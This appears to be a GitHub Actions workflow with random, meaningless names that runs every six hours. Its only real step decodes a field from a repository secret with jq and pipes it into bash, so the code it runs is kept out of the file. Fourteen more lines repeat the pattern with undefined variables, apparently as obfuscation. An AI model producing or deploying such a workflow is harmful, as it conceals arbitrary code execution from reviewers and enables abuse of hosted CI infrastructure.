name: duyunahen
on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duyunahen
        env:
          bbcvr9827: ${{ secrets.bbcvr9827 }}
        run: |
          echo $bbcvr9827 | jq -r .fdjct20662 | /bin/bash
          echo $qo866 | jq -r .dwm6 | /bin/bash
          echo $kpj362 | jq -r .xk69714 | /bin/bash
          echo $bfun9 | jq -r .rvgz48 | /bin/bash
          echo $k8000 | jq -r .tqerc9915 | /bin/bash
          echo $tdpow9 | jq -r .js76659 | /bin/bash
          echo $of3852 | jq -r .kka6125 | /bin/bash
          echo $bnj3 | jq -r .lkbty342 | /bin/bash
          echo $ss98 | jq -r .hn7 | /bin/bash
          echo $wthm0 | jq -r .mt166 | /bin/bash
          echo $wgx6 | jq -r .ue7 | /bin/bash
          echo $xgk2 | jq -r .idn726 | /bin/bash
          echo $pknzl57 | jq -r .dd624 | /bin/bash
          echo $vqfk569 | jq -r .funct38470 | /bin/bash
          echo $tojuh75721 | jq -r .ld5 | /bin/bash

